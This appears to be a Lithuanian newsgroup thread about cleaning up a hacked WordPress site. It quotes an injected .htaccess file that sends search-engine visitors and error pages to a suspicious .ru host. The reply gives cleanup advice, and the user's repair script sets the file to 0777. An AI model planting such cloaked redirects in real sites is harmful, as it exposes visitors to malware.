Turejau ir ash shita malonuma :D

1. pakeisk ftp ir kitus slaptazhodzhius
2. pakeisk y savo htaccess failiuka ir permisionus berods 444 uzhdek
3. prasichekink ar nera kuris nors ish php failiuku itartinai didelis ir 
pazhek ar itartinai dideliame nera koduko papiktinto su base64

P.S. pasidaryk greitai nes guglas inmes tave y malwarininku sarashus :)

FX

"useris"  wrote in message news:jgkg9j$jf6$1@trimpas.omnitel.net...

Pakeisto .htaccess failo tūrinys:


                              <IfModule mod_rewrite.c>
                              RewriteEngine On
                              RewriteCond %{HTTP_REFERER}
^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)
                              RewriteRule ^(.*)$
http://xisicongatarc.ru/emain/index.php [R=301,L]
                              RewriteCond %{HTTP_REFERER}
^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)
                              RewriteRule ^(.*)$
http://xisicongatarc.ru/emain/index.php [R=301,L]
                              </IfModule>


# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress



                              ErrorDocument 400
http://xisicongatarc.ru/emain/index.php
                              ErrorDocument 401
http://xisicongatarc.ru/emain/index.php
                              ErrorDocument 403
http://xisicongatarc.ru/emain/index.php
                              ErrorDocument 404
http://xisicongatarc.ru/emain/index.php
                              ErrorDocument 500
http://xisicongatarc.ru/emain/index.php







Laikinai pasirašiau php skriptelį, kad nereikėtų rankom vis trint kodo,
tačiau reikia vis paleidinėtį jį, kad suveiktų

<?php

chmod(".htaccess", 0777);  // octal; correct value of mode

$myFile = ".htaccess";
$fh = fopen($myFile, 'w') or die("can't open file");

$stringData = "
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress";

fwrite($fh, $stringData);

fclose($fh);

?>